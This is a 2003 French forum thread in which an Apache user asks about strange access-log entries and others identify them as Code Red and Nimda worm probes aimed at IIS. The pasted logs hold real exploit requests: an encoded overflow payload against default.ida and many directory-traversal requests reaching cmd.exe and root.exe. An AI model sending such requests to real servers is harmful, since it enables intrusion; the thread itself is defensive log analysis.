[ Appache ] Question sur le acces.log

Question sur le acces.log [ Appache ] - PHP - Programmation

Marsh Posté le 16-05-2003 à 21:14:38    

213.36.197.201
[27/Apr/2003:13:55:35 +0200]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0"
403
312


j'ai ca dans mon log "acces" parmis tous les ips local ( 127.0.0.1 )  
il apparait 2, 3 fois avec des ips differents ( mais pas local )
alors que mon serveur est privé...
 
piratage ? spy ?

Reply

Marsh Posté le 16-05-2003 à 21:14:38   

Reply

Marsh Posté le 16-05-2003 à 21:18:40    

213.36.137.68 - - [16/May/2003:00:38:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 317
213.36.137.68 - - [16/May/2003:00:38:25 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 315
213.36.137.68 - - [16/May/2003:00:38:33 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325
213.36.137.68 - - [16/May/2003:00:38:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325
213.36.137.68 - - [16/May/2003:00:38:49 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339
213.36.137.68 - - [16/May/2003:00:38:57 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 356
213.36.137.68 - - [16/May/2003:00:39:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 356
213.36.137.68 - - [16/May/2003:00:39:12 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 372
213.36.137.68 - - [16/May/2003:00:39:20 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:28 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.36.137.68 - - [16/May/2003:00:39:37 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:44 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:53 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318
213.36.137.68 - - [16/May/2003:00:40:00 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318
213.36.137.68 - - [16/May/2003:00:40:08 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339
213.36.137.68 - - [16/May/2003:00:40:16 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339

 
ca, c'est sur c'est une tentative de hack :D

Reply

Marsh Posté le 16-05-2003 à 21:21:28    

J-'-R a écrit :


ca, c'est sur c'est une tentative de hack :D


 
Mais non, c'est des IIS vérolés qui cherchent à se reproduire.
 
 
 


rincevent:/home/kadreg# grep cmd.exe /etc/apache/logs/default-access_log | wc -l
 121421
rincevent:/home/kadreg# grep default.ida /etc/apache/logs/default-access_log | wc -l
   2098
rincevent:/home/kadreg#
 


---------------
brisez les rêves des gens, il en restera toujours quelque chose...  -- laissez moi troller sur discu !
Reply

Marsh Posté le 16-05-2003 à 21:24:56    

HotShot a écrit :

Nope, c simplement un énième ver (Nimda, Codered etc.) qui balance une requète sur plein d'IPs, et c tombé sur la tienne par hasard à un moment...  
 
Tu risques aussi de voir apparaitre des GET cmd.exe etc.
 
De toute façon, ça n'attaque que les serveurs à base de Microsoft, donc pas de panique. A part remplir ton log d'erreurs 404, ca fera rien :p


ok parfait, je me suis inquiété pour rien... et tu m a grillé sur ma question suivante :D

Reply

Marsh Posté le 16-05-2003 à 21:29:14    

[Fri May 02 12:59:44 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/c
[Fri May 02 12:59:47 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/d
[Fri May 02 12:59:49 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/scripts
[Fri May 02 12:59:51 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/_vti_bin
[Fri May 02 12:59:53 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/_mem_bin
[Fri May 02 12:59:55 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/msadc

 
ca c est du hack manuel ? ou vers ?

Reply

Marsh Posté le 16-05-2003 à 22:29:51    

:bounce:

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed